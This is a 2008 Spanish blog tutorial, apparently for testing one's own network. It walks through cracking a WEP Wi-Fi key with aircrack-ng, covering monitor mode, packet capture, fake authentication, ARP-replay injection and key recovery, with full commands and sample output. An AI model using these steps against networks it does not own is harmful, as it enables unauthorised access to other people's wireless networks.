domingo, 19 de octubre de 2008

Como usar aircrack-ng

Con el aircrack-ng podemos probar que tan segura es nuestra red inalambrica intentando conseguir la contraseña de dicha red capturando y leyendo paquetes de su trafico. Aircrack puede desencriptar WEP, WPA, WPA2-PSK y cuenta con una numerosa cantidad de ataques y opciones para hacerlo.

Observaciones

- Debes descargar e instalar la suite aircrack-ng 1.0 (probado en esta)
www.aircrack-ng.org
- Tu adaptador inalambrico debe soportar modo monitor, la lista de dispositivos soportados esta en www.aircrack-ng.org

Pasos a seguir


- Abrir una terminal
- Adquirir privilegios de administrador escribiendo
$sudo -i

-ejecutar el comando iwconfig
#iwconfig
en la salida de este comando podremos ver el nombre de nuestra interface en mi caso esta es mi salida

lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Managed Frequency:2.437 GHz Access Point: Not-Associated
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=1/1
Retry:off RTS thr:off Fragment thr:off
Power Management:off
Link Quality=0/70 Signal level=-94 dBm Noise level=-94 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Nos podemos dar cuenta que la interface es ath0 (tarjeta netgear con chipset atheros)

-Ejecutamos airmon-ng de la siguiente forma

#airmon-ng start wifi0
donde indicamos ejecutar airmon-ng "start" comenzar modo monitor "wifi0" interface, esto nos debe dar una salida como esta

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

este programa es parte de la suite aircrack-ng y será el encargado de habilitar el modo monitor en nuestra interface

donde podemos ver que se ha creado la interface ath1 que esta en modo monitor, podemos confirmar con un iwconfig

-Luego podemos ya comenzar la captura de paquetes con airodump-ng
utilizando la opcion --help tras airodump-ng podremos ver la ayuda y las opciones para el mismo

debemos ejecutar:
#airodump-ng ath1
y nos mostrara lo siguiente

CH 6 ][ Elapsed: 24 s ][ 2008-10-19 23:17

BSSID PWR Beacons #Data, #/s CH MB ENC CIP AUT ESSID

00:02:6F:4A:CC:BB 21 120 6 0 7 -1 WEP WEP mynetwork

BSSID STATION PWR Rate Lost Packets Probes

00:02:6F:4A:CC:BB 00:07:95:AC:AA:BB 46 0 -1 6 8

donde nos muestra el bssid essis datos canal encriptacion cifrado y autentificacion de la red inalambrica

pero estos datos no se estan guardando aun por lo que presionamos ctrl c para terminar el programa y especificamos al ejecutarlo que queremos guardar los datos capturados y filtrar el canal de la red de la siguiente forma -w seguido por el nombre del archivo a crear y -c para filtrar el canal de la red

en mi caso la red esta en el canal 7 por lo que escribimos

#airodump-ng -w capturas -c 7 ath1

y ya esta guardando las capturas en el archivo capturas.cap y solo nos muestras las redes del canal 7, si el trafico de esta red es muy bajo debes utilizar el aireplay-ng con sus debidas opciones para inyectar trafico a dicha red yo lo utilizo de la siguiente forma.

#aireplay-ng -1 0 -e mynetwork -a 00:02:6F:4A:CC:BB -b 00:02:6F:4A:CC:BB -h 01:07:6b:AA:CD:BB ath1
donde "aireplay-ng" ejecuta el programa "-1" indica el ataque que ene este caso es asociarse a la red "0" el tiempo "-e" el essid de la red "-a" el bssid del la red "-b" el bssid de la red y "ath1" la interface, de todo salir bien esto debe darnos una salida como esta

17:16:30 waiting for beacon frame (BSSID:00:02:6F:4A:CC:BB)
14:16:30 Sending Authentication Request
14:16:30 Authentication Successfull
14:16:30 Sending Association Request
14:16:30 Association successfull ;)
#

y aqui procedemos inyectar trafico en la red con la opcion "3", utilizamos la opcion "r" para leer el fichero que airodump esta creando y si deseamos controlar el numero de paquetes por segundo podemos agregar la opcion "x" seria algo silimar a esto

#aireplay-ng -3 -e mynetwork -a 00:02:6F:4A:CC:BB -b 00:02:6F:4A:CC:BB -h 01:07:6b:AA:CD:BB -r capturas.cap -x 200 ath1

"uso de la opcion -x" si no la utilizas automaticamente se usara por defecto la velocidad mas alta que permita tu procesador y tu adaptador wireless, si al inyectar sin la opcion -x el trafico capturado deja de aumentar preciona ctrl c en la terminal donde estas corriendo aireplay-ng y utiliza -x con una cantidad de pps mas pequeña (solo para computadoras no muy rapidas)

si todo marcha bien ya debemos ver los paquetes de capturas en aumento ahora solo queda esperar capturar 20,000 paquetes para hacer el primer ataque a nuestra WEP

al tener 20,000 paquetes capturados, ejecutamos aircrack-ng capturas.cap
luego de pasar unos segundos nos mostrara la clave encontrada, escribiendo solo aircrack-ng puedes ver las diferentes opciones y los diferentes ataques.
mucha suerte en tu prueba de seguridad para tu red,
cualquier duda o pregunta deja tu comentario.

No hay comentarios: